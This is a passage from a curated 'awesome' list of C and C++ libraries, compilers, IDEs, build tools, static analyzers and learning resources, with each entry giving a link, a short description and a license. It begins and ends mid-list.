[Duktape](https://github.com/svaarala/duktape) - An embeddable Javascript engine with compact footprint. [MIT] [website](http://duktape.org) * [JavaCpp](https://github.com/bytedeco/javacpp) - The missing bridge between Java and native C++. [Apache2] * [libffi](https://github.com/libffi/libffi) - A portable foreign-function interface library. [MIT] [website](https://sourceware.org/libffi/) * [Lua](http://www.lua.org/) - A minimal and fast scripting engine for configuration files and basic application scripting. [MIT] * [LuaBridge](https://github.com/vinniefalco/LuaBridge) - A lightweight, dependency-free library for binding Lua to C++. [MIT] * [luacxx](https://github.com/dafrito/luacxx) - C++11 API for creating Lua bindings. [MIT] * [nbind](https://github.com/charto/nbind) - Magical headers that make your C++ library accessible from JavaScript. [MIT] * [PHP-CPP](https://github.com/CopernicaMarketingSoftware/PHP-CPP) - A library to build PHP extensions with C++. [Apache2] [website](http://www.php-cpp.com/) * [pocketpy](https://github.com/blueloveTH/pocketpy) - C++17 header-only Python interpreter for game scripting. [MIT] [website](https://pocketpy.dev/) * [pybind11](https://github.com/pybind/pybind11) - Seamless operability between C++11 and Python. [BSD] * [SIP](https://riverbankcomputing.com/software/sip/intro) - C or C++ Bindings Generator for Python v2 and v3. [GPL] * [sol2](https://github.com/ThePhD/sol2) - A C++ <-> Lua API wrapper with advanced features and top notch performance. [MIT] * [SWIG](https://github.com/swig/swig) - A wrapper/interface Generator that let you link your c++ code to Javascript, Perl, PHP, Python, Tcl and Ruby. [GPL/Output not licensed] [website](http://www.swig.org/) * [V7](https://github.com/cesanta/v7) - An embedded JavaScript engine. [GPL2] * [V8](https://v8.dev) - A fast JavaScript engine by Google that can be embedded into any C++ application. [BSD] * [ChakraCore](https://github.com/Microsoft/ChakraCore) -A JavaScript engine by Microsoft that can be embedded into nodejs. [MIT] ## Serialization * [Bitsery](https://github.com/fraillt/bitsery) - Header only C++ binary serialization library. [MIT] * [Bond](https://github.com/Microsoft/bond) - An open source, cross-platform framework for working with schematized data. [MIT] * [Boost.Serialization](https://github.com/boostorg/serialization) - Boost Serialization Library. [Boost] [website](https://boost.org/libs/serialization) * [Cap'n Proto](https://github.com/capnproto/capnproto) - Fast data interchange format and capability-based RPC system. [MIT] [website](https://capnproto.org/) * [cereal](https://github.com/USCiLab/cereal) - A C++11 library for serialization. [BSD] * [cista](https://github.com/felixguendling/cista) - A C++17 library for zero-copy high-performance (de-)serialization. [MIT] * [cppcodec](https://github.com/tplgy/cppcodec) - Header-only C++11 library to encode/decode base64, base32 and hex with consistent, flexible API. [MIT] * [FastBinaryEncoding](https://github.com/chronoxor/FastBinaryEncoding) - Fast Binary Encoding is ultra fast and universal serialization solution for C++, C#, Go, Java, JavaScript, Kotlin, Python, Ruby, Swift. [MIT] * [FlatBuffers](https://github.com/google/flatbuffers) - A Memory efficient serialization library. [Apache2] * [Kaitai Struct](http://kaitai.io) - A declarative language to describe various binary data structures and a compiler to generate C++ parser code. [GPLv3+][MIT][Apache2] * [MessagePack](https://github.com/msgpack/msgpack-c) - Efficient binary serialization format "like JSON" for C and C++. [Apache2] [website](http://msgpack.org/) * [mrpt-serialization](https://github.com/mrpt/mrpt/) - Versioned serialization to binary or text formats. [BSD] [website](https://docs.mrpt.org/reference/latest/group_mrpt_serialization_grp.html) * [nanopb](https://github.com/nanopb/nanopb) - Small code-size Protocol Buffers implementation in ANSI C. [Zlib] * [protobuf](https://github.com/protocolbuffers/protobuf) - Protocol Buffers - Google's data interchange format. [BSD] * [protobuf-c](https://github.com/protobuf-c/protobuf-c) - Protocol Buffers implementation in C. [BSD] * [SimpleBinaryEncoding](https://github.com/real-logic/simple-binary-encoding) - encoding and decoding application messages in binary format for low-latency applications. [Apache2] * [upb](https://github.com/protocolbuffers/upb) - A small protobuf implementation in C. [BSD] * [YAS](https://github.com/niXman/yas) - Very fast **Y**et **A**nother **S**erialization library supports the binary/text/json formats. [Boost] * [zpp_bits](https://github.com/eyalz800/zpp_bits) - Actually, the fastest modern **S**erialization library. Just check [this video](https://www.youtube.com/watch?v=G7-GQhCw8eE&ab_channel=CppCon). ## Sorting * [pdqsort](https://github.com/orlp/pdqsort) - Pattern-defeating quicksort. [zlib] * [Timsort](https://github.com/gfx/cpp-TimSort) - A templated stable sorting function which outperforms quicksort-based algorithms including std::sort, for reversed or semi-sorted data. [MIT] * [Indiesort](https://github.com/mattreecebentley/plf_indiesort) - A sort wrapper which enables the use of std::sort (& other random-access sort functions) with non-random-access containers, and also improves sort performance for large/non-trivially-copyable types in random-access containers and arrays. [zLib] [website](https://plflib.org/indiesort.htm) ## Video * [libvpx](http://www.webmproject.org/code/) - VP8/VP9 Codec SDK. [BSD] * [FFmpeg](https://www.ffmpeg.org/) - A complete, cross-platform solution to record, convert and stream audio and video. [LGPL2/GPL2] * [libde265](https://github.com/strukturag/libde265) - Open h.265 video codec implementation. [LGPL] [website](http://www.libde265.org/) * [x265](https://bitbucket.org/multicoreware/x265_git/src) - Open h.265 video codec implementation. [GPL2] [website](https://x265.readthedocs.io/en/master/) * [OpenH264](https://github.com/cisco/openh264) - Open Source H.264 Codec. [BSD] [website](http://www.openh264.org/) * [Theora](http://www.theora.org/) - A free and open video compression format. [BSD] * [Vireo](https://github.com/twitter/vireo/) - A lightweight and versatile video processing library by Twitter. [MIT] ## Virtual Machines * [CarpVM](https://github.com/tekknolagi/carp) - "interesting" VM in C. Let's see how this goes. [GPLv3] * [MicroPython](https://github.com/micropython/micropython) - Aims to put an implementation of Python 3.x on a microcontroller. [MIT] * [TinyVM](https://github.com/jakogut/tinyvm) - A small, fast, lightweight virtual machine written in pure ANSI C. [MIT] ## Web Application Framework * [Civetweb](https://github.com/civetweb/civetweb) - Provides easy to use, powerful, C/C++ embeddable web server with optional CGI, SSL and Lua support. [MIT] * [C++ REST SDK](https://github.com/Microsoft/cpprestsdk) - Microsoft project for cloud-based client-server communication in native code using a modern asynchronous C++ API design. [MIT] * [CppCMS](http://cppcms.com/) - A Free High Performance Web Development Framework (not a CMS). [LGPLv3] * [Crow](https://github.com/CrowCpp/Crow) - Crow is a C++ microframework for running web services. It uses routing similar to Python's Flask. [BSD] [website](https://crowcpp.org) * [Cutelyst](https://github.com/cutelyst/cutelyst) - A C++ Web Framework built on top of Qt, using the simple approach of Catalyst (Perl) framework. [LGPLv2.1+] [website](https://cutelyst.org/) * [Drogon](https://github.com/an-tao/drogon) - A C++14/17 based, high-performance HTTP application framework. [MIT] * [C++ wfrest](https://github.com/wfrest/wfrest) - C++ Web Framework REST API. [Apache2] * [facil.io](https://github.com/boazsegev/facil.io) - Evented, high performance C web framework supporting HTTP, WebSockets, SSE and more. [MIT] [website](http://facil.io) * [Kore](https://kore.io/) - ultra fast and flexible web server / framework for web applications developed in C. [ISC] * [libOnion](http://www.coralbits.com/libonion/) - lightweight library to help you create webservers in C programming language. [LGPLv3] * [lwan](https://github.com/lpereira/lwan) - Experimental, scalable, high performance HTTP server. [GPL2] * [oat++](https://github.com/oatpp/oatpp) - Light, zero-dependency framework to create high-performance web-services. [Apache-2.0] [website](https://oatpp.io/) * [Pistache](http://pistache.io/) - Pistache is a C++ REST framework written in pure C++11 with no external dependency. [Apache2] * [QDjango](https://github.com/jlaine/qdjango/) - A web framework written in C++ and built on top of the Qt library. Where possible it tries to follow django's API, hence its name. [LGPL] * [TreeFrog Framework](https://github.com/treefrogframework/treefrog-framework) - High-speed and full-stack web application framework based on C++ and Qt, which supports HTTP and WebSocket protocol (with O/R mapping). [BSD] [website](http://www.treefrogframework.org/) * [userver](https://github.com/userver-framework/userver) - Asynchronous C++17 framework with a rich set of abstractions and database drivers for fast and comfortable creation of efficient microservices, services and utilities. [Apache-2.0] [website](https://userver.tech/) * [Wt](http://www.webtoolkit.eu/wt) - A C++ library for developing web applications. [GPL/Commercial] ## XML *XML is crap. Really. There are no excuses. XML is nasty to parse for humans, and it's a disaster to parse even for computers. There's just no reason for that horrible crap to exist. - Linus Torvalds* * [Boost.PropertyTree](https://github.com/boostorg/property_tree) - A property tree parser/generator that can be used to parse XML/JSON/INI/Info files. [Boost] [website](https://boost.org/libs/property_tree) * [Expat](http://www.libexpat.org/) - An XML parser library written in C. [MIT] * [Libxml2](http://xmlsoft.org/) - The XML C parser and toolkit of Gnome. [MIT] * [libxml++](http://libxmlplusplus.sourceforge.net/) - An XML Parser for C++. [LGPL2] * [Mini-XML](https://github.com/michaelrsweet/mxml) - A small XML parsing library written in ANSI C. [LGPL2 with exceptions] * [PugiXML](http://pugixml.org/) - A light-weight, simple and fast XML parser for C++ with XPath support. [MIT] * [RapidXml](http://rapidxml.sourceforge.net/) - An attempt to create the fastest XML parser possible, while retaining useability, portability and reasonable W3C compatibility. [Boost] * [TinyXML](http://sourceforge.net/projects/tinyxml/) - A simple, small, minimal, C++ XML parser that can be easily integrating into other programs. [zlib] * [TinyXML2](https://github.com/leethomason/tinyxml2) - A simple, small, efficient, C++ XML parser that can be easily integrating into other programs. [zlib] * [TinyXML++](https://github.com/rjpcomputing/ticpp) - A completely new interface to TinyXML that uses MANY of the C++ strengths. Templates, exceptions, and much better error handling. [MIT] * [Xerces-C++](http://xerces.apache.org/xerces-c/) - A validating XML parser written in a portable subset of C++. [Apache2] ## Yaml * [mini-yaml](https://github.com/jimmiebergmann/mini-yaml) - Single header YAML 1.0 C++11 serializer/deserializer. [MIT] * [yaml-cpp](https://github.com/jbeder/yaml-cpp) - A YAML parser and emitter in C++. [MIT] * [rapidyaml](https://github.com/biojppm/rapidyaml) - Rapid YAML is a C++ library to parse and emit YAML. [MIT] ## Miscellaneous *Useful libraries or tools that don't fit in the categories above or maybe just not categorised yet* * [access_profiler](https://github.com/arvidn/access_profiler) - A tool to count accesses to member variables in c++ programs. [GPL3] * [American fuzzy lop](http://lcamtuf.coredump.cx/afl/) a.k.a. afl-fuzz - Crazy fuzzing tool that automatically discovers bugs given time and minimal example input. [Apache2] * [Argon2](https://github.com/P-H-C/phc-winner-argon2) - The password hash Argon2, winner of PHC. [CC0/Apache2] * [Better String](http://bstring.sourceforge.net) - An alternative to the string library for C which is more functional and does not have buffer overflow overrun problems. Also includes a C++ wrapper. [BSD, GPL2] * [Boost.Signals2](https://github.com/boostorg/signals2) - An implementation of a managed signals and slots system. [Boost] [website](https://boost.org/libs/signals2) * [Cheat Sheets of HackingCPP](https://hackingcpp.com/cpp/cheat_sheets.html) - Cool cheat sheets and infographics for algorithms, views, containers, randomness, etc. * [Concord](https://github.com/Cogmasters/concord) - A Discord API wrapper library written in C. [MIT] [website](https://cogmasters.github.io/concord) * [CPPItertools](https://github.com/ryanhaining/cppitertools) - Range-based for loop add-ons inspired by the Python builtins and itertools library. [BSD-2-Clause] * [D++ (DPP)](https://github.com/brainboxdotcc/DPP) - A lightweight, high performance and scalable C++ library for creating Discord Bots. [Apache2] [website](https://dpp.dev) * [DynaMix](https://github.com/iboB/dynamix) - A library which allows you to compose and modify objects at run time. [MIT] * [fccf](https://github.com/p-ranav/fccf) - A command-line tool that recursively searches a directory to find C/C++ source code matching a search string. [MIT] * [{fmt}](https://github.com/fmtlib/fmt) :zap: - Small, safe and fast formatting library for C++. [Simplified BSD] [website](https://fmt.dev) * [FastFormat](http://www.fastformat.org) - Fast, Safe C++ Formatting inspired by log4j and Pantheios. [Simplified BSD] * [casacore](https://code.google.com/p/casacore/) - A set of c++ core libraries derived from aips++. [LGPL] * [QtVerbalExpressions](https://github.com/VerbalExpressions/QtVerbalExpressions) - This Qt lib is based off of the C++ VerbalExpressions library. [MIT] * [cxx-prettyprint](https://github.com/louisdx/cxx-prettyprint) - A pretty printing library for C++ containers. [Boost] * [icecream-cpp](https://github.com/renatoGarcia/icecream-cpp) - A small printing library for debugging purposes. [MIT] * [gcc-poison](https://github.com/leafsr/gcc-poison) - A simple header file for developers to ban unsafe C/C++ functions from applications. * [jwt-cpp](https://github.com/Thalhammer/jwt-cpp) - A header only library for creating and validating JSON web tokens in C++. [MIT] * [Kangaru](https://github.com/gracicot/kangaru) - A dependency injection container for C++11 and C++14. [MIT] * [Klib](https://github.com/attractivechaos/klib) - Small and lightweight implementations of common algorithms and data structures. [MIT] * [libsigc++](https://github.com/libsigcplusplus/libsigcplusplus) - A typesafe callback system for standard C++. [LGPL] [website](https://libsigcplusplus.github.io/libsigcplusplus) * [libcpuid](https://github.com/anrieff/libcpuid) - A small C library for x86 CPU detection and feature extraction. [BSD] * [libevil](https://github.com/avati/libevil) - The Evil License Manager. [GPLv3] * [libnih](https://github.com/keybuk/libnih) - A lightweight library of C functions and structures. [GPL2.1] * [libusb](https://libusb.info/) - A universal USB library which allows for portable access to USB devices. [LGPL2] * [Mach7](https://github.com/solodon4/Mach7) - A Pattern-matching library for C++. [BSD] * [mio](https://github.com/mandreyel/mio) - Cross-platform C++11 header-only library for memory mapped file IO. [MIT] * [PEGTL](https://github.com/taocpp/PEGTL) - The Parsing Expression Grammar Template Library. [MIT] * [Remote Call Framework](http://www.deltavsoft.com/) - Inter-process communication framework for C++. [GPL2/Commercial] * [Scintilla](http://scintilla.org/) - A free source code editing component. [MIT] * [SDS](https://github.com/antirez/sds) - Simple Dynamic Strings library for C. [BSD] * [semver.c](https://github.com/h2non/semver.c) - A semver parser and render in ANSI C. [MIT] * [Serial Communication Library](https://github.com/wjwwood/serial) - Cross-platform, Serial Port library written in C++. [MIT] * [sigslot](http://sigslot.sourceforge.net/) - C++ Signal/Slot Library. [PublicDomain] * [SimpleSignal](https://github.com/larspensjo/SimpleSignal) - High performance C++11 signals. [PublicDomain] * [Stage](https://github.com/rtv/Stage) - Mobile robot simulator. [GPL2] * [stdman](https://github.com/jeaye/stdman) - A tool that parses archived HTML files from [cppreference](https://cppreference.com) and generates groff-formatted manual pages for Unix-based systems. [MIT] * [stb](https://github.com/nothings/stb) :zap: - A range of single-file libraries for C/C++. [PublicDomain] * [StrTk](https://www.partow.net/programming/strtk/index.html) - A C++ library consisting of high performance string processing routines. [MIT] * [Tulip Indicators](https://tulipindicators.org) - A C library of over 100 financial technical analysis indicators. [LGPL] * [ub-canaries](https://github.com/regehr/ub-canaries) - A collection of C/C++ programs that try to get compilers to exploit undefined behavior. * [value-category-cheatsheet](https://github.com/jeaye/value-category-cheatsheet) A PDF cheatsheet for lvalues, rvalues, and the like. [Jank copyleft] * [VarTypes](https://github.com/szi/vartypes) - A feature-rich, object-oriented framework for managing variables in C++ / Qt4. [LGPL] * [ZBar](http://zbar.sourceforge.net/) - A barcode scanner library, which allows to scan photos/images/video streams for barcodes and return their value. [LGPL2] * [ZXing](https://github.com/zxing/zxing/) - An open-source, multi-format 1D/2D barcode image processing library implemented in Java, with ports to other languages. [Apache] * [pprint](https://github.com/p-ranav/pprint) - Pretty Printer for Modern C++. [MIT] * [pspsdk](https://github.com/pspdev/pspsdk) - An open-source SDK for PSP homebrew development. [BSD/GNU GPL3] # Software *Software for creating a development environment.* ## Compiler *List of C or C++ compilers* * [8cc](https://github.com/rui314/8cc) - A Small C Compiler. * [c](https://github.com/ryanmjacobs/c) - Compile and execute C "scripts" in one go! [MIT] * [Clang](http://clang.llvm.org/) - A C compiler for LLVM. Supports C++11/14/1z C11. Developed by LLVM Team. [NCSA] * [GCC](https://gcc.gnu.org/) - GNU Compiler Collection. Supports C++11/14/1z C11 and OpenMP. [GNU GPL3] * [PCC](http://pcc.ludd.ltu.se/) - A very old C compiler. Supports C99. * [Intel C++ Compiler](https://software.intel.com/en-us/c-compilers) - Developed by Intel. * [LLVM](http://llvm.org/) - Collection of modular and reusable compiler and toolchain technologies. * [Microsoft Visual C++](https://docs.microsoft.com/en-us/cpp/dotnet/dotnet-programming-with-cpp-cli-visual-cpp?view=msvc-160) - MSVC, developed by Microsoft. * [Open WatCom](https://github.com/open-watcom) - Watcom C, C++, and Fortran cross compilers and tools. [Sybase Open Watcom Public License] * [Oracle Solaris Studio](http://www.oracle.com/technetwork/server-storage/solarisstudio/overview/index.html) - C, C++ and Fortran compiler for SPARC and x86. Supports C++11. Available on Linux and Solaris. [OTN Developer License] * [TCC](http://bellard.org/tcc/) - Tiny C Compiler. [LGPL] ## Online Compiler *List of online C or C++ compilers* * [codechef](https://www.codechef.com/ide) - A simple online compiler CodeChef. * [codepad](http://codepad.org/) - An online compiler/interpreter, and a simple collaboration tool. * [coliru](http://coliru.stacked-crooked.com/) - Online compiler/shell with support for various C++ compilers. * [Compiler Explorer](http://gcc.godbolt.org/) - An interactive compiler with assembly output available. * [CompileOnline](http://www.tutorialspoint.com/codingground.htm) - Compile and Execute C++ online on Linux. * [Ideone](http://ideone.com/) - An online compiler and debugging tool which allows you to compile source code and execute it online in more than 60 programming languages. * [Programiz](https://www.programiz.com/cpp-programming/online-compiler) - An online compiler for learners and developers. * [repl.it](https://repl.it) - A powerful yet simple tools and platforms for educators, learners, and developers. * [Rextester](http://rextester.com/runcode) - Online compiler which provides several compilers(Clang, GCC, MSVC) and several editors. * [Try It Online](https://tio.run/) - TIO is a family of online interpreters for an evergrowing list of practical and recreational programming languages. * [Wandbox](https://wandbox.org) - An online Clang/GCC compiler with Boost available. * [paiza.io](https://paiza.io/en) - An online C/C++ compiler with multiple files supporting feature, Github(gist) integration and collaborative editing. * [InterviewBit](https://www.interviewbit.com/online-cpp-compiler/) - A simple and easy to use online C++ compiler. ## Debugger *List of C or C++ debuggers* * [Comparison of debuggers](https://en.wikipedia.org/wiki/Comparison_of_debuggers) - A list of Debuggers from Wikipedia. * [GDB](https://www.gnu.org/software/gdb/) - GNU Debugger. * [LLDB](http://lldb.llvm.org/) - The LLDB Debugger. * [Metashell](https://metashell.readthedocs.org) - An interactive template metaprogramming shell which includes the MDB metadebugger. * [Valgrind](http://valgrind.org/) - A tool for memory debugging, memory leak detection, and profiling. * [x64dbg](http://x64dbg.com/) - An open-source x64/x32 debugger for windows. ## Integrated Development Environment *List of C or C++ nominal IDEs.* * [Anjuta DevStudio](http://anjuta.org/) - The GNOME IDE. [GPL3] * [AppCode](http://www.jetbrains.com/objc/) - an IDE for Objective-C, C, C++, and JavaScript development built on JetBrains’ IntelliJ IDEA platform. * [Cevelop](https://www.cevelop.com) - Cross-platform C and C++ IDE based on Eclipse CDT with additional plug-ins. * [CLion](http://www.jetbrains.com/clion/) - Cross-platform C and C++ IDE from JetBrains. * [Code::Blocks](http://www.codeblocks.org/) - A free C, C++ and Fortran IDE. * [CodeLite](http://codelite.org/) - Another cross-plaform, free C and C++ IDE. [GPL2 with an exception for plugins] * [color_coded](https://github.com/jeaye/color_coded) - A vim plugin for libclang-based highlighting. [MIT] * [Dev-C++](http://sourceforge.net/projects/orwelldevcpp/) - A portable C/C++/C++11 IDE. * [Eclipse CDT](http://www.eclipse.org/cdt/) - A fully functional C and C++ IDE based on the Eclipse platform. * [Embarcadero Dev-CPP](https://github.com/Embarcadero/Dev-Cpp) - A fork of Dev-C++ that comes preinstalled with new themes and modern compilers. [GPLv2] [website](https://www.embarcadero.com/free-tools/dev-cpp) * [Geany](http://www.geany.org/) - Small, fast, cross-platform IDE. [GPL] * [IBM VisualAge](http://www-03.ibm.com/software/products/en/visgen) - A family of computer integrated development environments from IBM. * [Irony-mode](https://github.com/Sarcasm/irony-mode) - A C/C++ minor mode for Emacs powered by libclang. * [juCi++](https://gitlab.com/cppit/jucipp) - Cross-platform, lightweight C++ IDE with libclang integration. [MIT] * [KDevelop](https://www.kdevelop.org/) - A free, open source IDE. * [Microsoft Visual Studio](https://www.visualstudio.com/) - An IDE from Microsoft. * [Microsoft Visual Studio Code](https://github.com/microsoft/vscode) :zap: - An open-source IDE from Microsoft. [MIT] [website](https://code.visualstudio.com) * [NetBeans](https://netbeans.org/) - An IDE for developing primarily with Java, but also with other languages, in particular PHP, C/C++, and HTML5. * [Qt Creator](https://github.com/qt-creator/qt-creator) :zap: - A cross-platform C++, JavaScript and QML IDE which is part of the SDK for Qt. [GPL3 with exceptions] [website](https://www.qt.io/product/development-tools) * [rtags](https://github.com/Andersbakken/rtags) - A c/c++ client/server indexer with for integration with emacs based on clang. * [Xcode](https://developer.apple.com/xcode/) - Developed by Apple. * [YouCompleteMe](https://github.com/ycm-core/YouCompleteMe) - YouCompleteMe is a fast, as-you-type, fuzzy-search code completion engine for Vim. * [cquery](https://github.com/cquery-project/cquery/) - A C++ code completion engine for vscode, emacs, vim, etc. ## Build Systems * [Bazel](https://bazel.build) - A multi-language, fast and scalable build system from Google. [Apache] * [Bear](https://github.com/rizsotto/Bear) - A tool to generate compilation database for clang tooling. [GPLv3] * [Buck](https://github.com/facebook/buck) - A fast build system that encourages the creation of small, reusable modules over a variety of platforms and languages including C++ developed and used at Facebook. Written in Java. [Apache] * [build2](https://build2.org/) - cross-platform build, packaging and dependency management toolchain for developing and packaging C/C++ projects. [MIT] * [clib](https://github.com/clibs/clib) - Package manager for the C programming language. [MIT] * [CMake](https://cmake.org/) - Cross-platform free and open-source software for managing the build process of software using a compiler-independent method. [BSD] * [Cget](https://github.com/pfultz2/cget) - Cmake package retrieval. [Boost] [website](http://cget.readthedocs.io) * [Conan](https://conan.io/) - C/C++ Package Manager, open sourced. [MIT] * [CPM](https://github.com/iauns/cpm) - A C++ Package Manager based on CMake and Git. * [FASTBuild](http://www.fastbuild.org/docs/home.html) - High performance, open-source build system supporting highly scalable compilation, caching and network distribution. * [Hunter](https://www.github.com/ruslo/hunter) - CMake driven cross-platform package manager for C++. [BSD-2] * [MesonBuild](http://mesonbuild.com) - An open source build system meant to be both extremely fast, and, even more importantly, as user friendly as possible. * [Ninja](https://ninja-build.org/) - A small build system with a focus on speed. * [Scons](http://www.scons.org/) - A software construction tool configured with a Python script. * [Sconsolidator](http://www.sconsolidator.com/) - Scons build system integration for Eclipse CDT. * [Spack](https://spack.io/) - A flexible package manager that supports multiple versions, configurations, platforms, and compilers. [Apache-2.0/MIT] * [SW](https://software-network.org/) - Cross-platform C++ (and other langs) Build System and Package Manager with a lot of packages available. [GPLv3] * [tundra](https://github.com/deplinenoise/tundra) - High-performance code build system designed to give the best possible incremental build times even for very large software projects. * [tup](http://gittup.org/tup/) - File-based build system that monitors in the background for changed files. * [Premake](http://premake.github.io) - A tool configured with a Lua script to generate project files for Visual Studio, GNU Make, Xcode, Code::Blocks, and more across Windows, Mac OS X, and Linux. * [Vcpkg](https://github.com/microsoft/vcpkg) - C++ library manager for Windows, Linux, and MacOS. [MIT] * [waf](https://gitlab.com/ita1024/waf) - Python-based framework for configuring, compiling and installing applications. [BSD] [website](https://waf.io/) * [XMake](https://xmake.io/) - A C/C++ cross-platform build utility based on Lua. [Apache] ## Static Code Analysis *List of tools for improving quality and reducing defects by code analysis* * [Cppcheck](http://cppcheck.sourceforge.net/) - A tool for static C/C++ code analysis. - [source](https://github.com/danmar/cppcheck) * [CppDepend](https://www.cppdepend.com/) - Simplifies managing a complex C/C++ code base by analyzing and visualizing code dependencies, by defining design rules, by doing impact analysis, and comparing different versions of the code. * [cpplint](https://github.com/cpplint/cpplint) - A C++ style checker following Google's C++ style guide. * [PVS-Studio](http://www.viva64.com/en/pvs-studio/) - A tool for bug detection in the source code of programs, written in C, C++ and C#. * [cpp-dependencies](https://github.com/tomtom-international/cpp-dependencies) - Tool to check C++ #include dependencies (dependency graphs created in .dot format). [Apache] * [include-what-you-use](https://github.com/include-what-you-use/include-what-you-use) - A tool for use with clang to analyze includes in C and C++ source files. [website](https://include-what-you-use.org/) * [Infer](https://github.com/facebook/infer) - A static analyzer for Java, C and Objective-C. [BSD] * [OCLint](http://oclint.org/) - A static source code analysis tool to improve quality and reduce defects for C, C++ and Objective-C. - [source](https://github.com/oclint/oclint) * [Clang Static Analyzer](http://clang-analyzer.llvm.org/index.html) - A source code analysis tool that finds bugs in C, C++, and Objective-C programs. * [Linticator](http://linticator.com) - Eclipse CDT integration of Pc-/FlexeLint. * [IKOS](https://github.com/NASA-SW-VnV/ikos) - Static analyzer for C/C++ based on the theory of Abstract Interpretation. [NOSA 1.3] * [List of tools for static code analysis](https://en.wikipedia.org/wiki/List_of_tools_for_static_code_analysis#C.2FC.2B.2B) - A list of tools for static code analysis from Wikipedia. * [OptView2](https://github.com/OfekShilon/optview2) - Inspect missed Clang optimizations. * [Trunk](https://trunk.io) - Toolkit to check, test, merge, and monitor code. ## Coding Style Tools * [Artistic Style](http://astyle.sourceforge.net/) - A tool to format C/C++/C#/Obj-C/Java code. Also known as astyle. * [ClangFormat](http://clang.llvm.org/docs/ClangFormat.html) - A tool to format C/C++/Obj-C code. * [Clang-Tidy](http://clang.llvm.org/extra/clang-tidy.html) - Clang-based C++ linter tool. * [EditorConfig](https://editorconfig.org/) - EditorConfig helps maintain consistent coding styles across different editors and IDEs. * [Uncrustify](https://github.com/uncrustify/uncrustify) - Code beautifier. # Resources *Various resources, such as books, websites, and articles for improving your C++ development skills and knowledge.* ## API Design * [Beautiful Native Libraries](http://lucumr.pocoo.org/2013/8/18/beautiful-native-libraries/) * [Designing Qt-Style C++ APIs](https://doc.qt.io/archives/qq/qq13-apis.html) ## Articles *Fantastic C++ related articles.* * [CppCon 2020 Presentation Materials](https://github.com/CppCon/CppCon2020) - CppCon 2020 Presentation Materials. * [CppCon 2019 Presentation Materials](https://github.com/CppCon/CppCon2019) - CppCon 2019 Presentation Materials. * [CppCon 2018 Presentation Materials](https://github.com/CppCon/CppCon2018) - CppCon 2018 Presentation Materials. * [CppCon 2017 Presentation Materials](https://github.com/CppCon/CppCon2017) - CppCon 2017 Presentation Materials. * [CppCon 2016 Presentation Materials](https://github.com/CppCon/CppCon2016) - CppCon 2016 Presentation Materials. * [CppCon 2015 Presentation Materials](https://github.com/CppCon/CppCon2015) - CppCon 2015 Presentation Materials. * [CppCon 2014 Presentation Materials](https://github.com/CppCon/CppCon2014) - CppCon 2014 Presentation Materials. * [C++Now 2019 Presentations](https://github.com/boostcon/cppnow_presentations_2019) - Presentation materials presented at C++Now 2019. * [C++Now 2018 Presentations](https://github.com/boostcon/cppnow_presentations_2018) - Presentation materials presented at C++Now 2018. * [C++Now 2017 Presentations](https://github.com/boostcon/cppnow_presentations_2017) - Presentation materials presented at C++Now 2017. * [C++Now 2016 Presentations](https://github.com/boostcon/cppnow_presentations_2016) - Presentation materials presented at C++Now 2016. * [C++Now 2015 Presentations](https://github.com/boostcon/cppnow_presentations_2015) - Presentation materials presented at C++Now 2015. * [C++Now 2014 Presentations](https://github.com/boostcon/cppnow_presentations_2014) - Presentation materials presented at C++Now 2014. * [C++Now 2013 Presentations](https://github.com/boostcon/cppnow_presentations_2013) - Presentation materials presented at C++Now 2013. * [C++Now 2012 Presentations](https://github.com/boostcon/cppnow_presentations_2012) - Presentation materials presented at C++Now 2012. ## Books *Fantastic C or C++ related books.* * [List of Free C or C++ Books](https://github.com/fffaraz/awesome-cpp/blob/master/books.md) * [Free C Books](https://github.com/EbookFoundation/free-programming-books/blob/main/books/free-programming-books-langs.md#c) - vhf/free-programming-books/C. * [Free C++ Books](https://github.com/EbookFoundation/free-programming-books/blob/main/books/free-programming-books-langs.md#cpp) - vhf/free-programming-books/C++. * [cppbestpractices](https://github.com/lefticus/cppbestpractices) - Collaborative Collection of C++ Best Practices. ## Coding Standards * [Cert C++](https://resources.sei.cmu.edu/downloads/secure-coding/assets/sei-cert-cpp-coding-standard-2016-v01.pdf) * [Misra C++ 2008](https://www.cppdepend.com/misra-cpp) * [Autosar C++ 2014](https://www.autosar.org/fileadmin/standards/adaptive/21-11/AUTOSAR_RS_CPP14Guidelines.pdf) ## Coding Style * [C++ Core Guidelines](https://github.com/isocpp/CppCoreGuidelines) - "Official" set of C++ guidelines, reviewed by the author of C++. * [C++ Dos and Don'ts](http://www.chromium.org/developers/coding-style/cpp-dos-and-donts) - The Chromium Projects > For Developers > Coding Style > C++ Dos and Don'ts. * [google-styleguide](https://github.com/google/styleguide) - Style guides for Google-originated open-source projects. * [Google C++ Style Guide](https://google.github.io/styleguide/cppguide.html) * [GNU Coding Standard](http://www.gnu.org/prep/standards/standards.html) * [Linux kernel coding style](https://www.kernel.org/doc/Documentation/process/coding-style.rst) * [LLVM Coding Standards](http://llvm.org/docs/CodingStandards.html) ## Podcasts * [CppCast](http://cppcast.com) - The first podcast by C++ developers for C++ developers. * [CppChat](http://cpp.chat) - A (sometimes) weekly look at what's going on in the world of C++ chatting with a guest from the community. ## Talks * [C++ Conferences](https://github.com/eoan-ermine/cpp-conferences) - Catalog of C++ conferences * [CppCon Talks](https://www.youtube.com/user/CppCon/videos) :zap: - The C++ conference. * [Quick game development with C++11/C++14](https://github.com/SuperV1234/cppcon2014) - CppCon 2014 talk by Vittorio Romeo. * [Presentation on Hana for C++Now 2015](https://github.com/ldionne/hana-cppnow-2015) * [Meeting Cpp](https://www.youtube.com/user/MeetingCPP/videos) - Meeting C++ Youtube Channel ## Videos *Fantastic C or C++ related videos.* * [List of C or C++ YouTube Videos](https://github.com/fffaraz/awesome-cpp/blob/master/videos.md) * [Awesome C Programming Tutorials in Hi Def [HD]](https://www.youtube.com/playlist?list=PLCB9F975ECF01953C) - A collection of detailed C Programming Language Tutorials for Beginners and New Programmers. * [C++](https://www.youtube.com/playlist?list=PL2F919ADECA5E39A6) - by VoidRealms. * [C++ Qt Programming](https://www.youtube.com/playlist?list=PL2D1942A4688E9D63) - by VoidRealms. * [C++ Programming Tutorials Playlist](https://www.youtube.com/playlist?list=PLAE85DE8440AA6B83) - TheNewBoston Official Buckys C++ Programming Tutorials Playlist. * [C++ Programming Tutorials from thenewboston](https://www.youtube.com/playlist?list=PLF541C2C1F671AEF6) - These are all of thenewboston's C++ programming tutorials. * [C++ GUI with Qt Playlist](https://www.youtube.com/playlist?list=PLD0D54219E5F2544D) - Official Playlist for thenewboston C++ GUI with Qt tutorials. * [Caleb Curry's C Programming 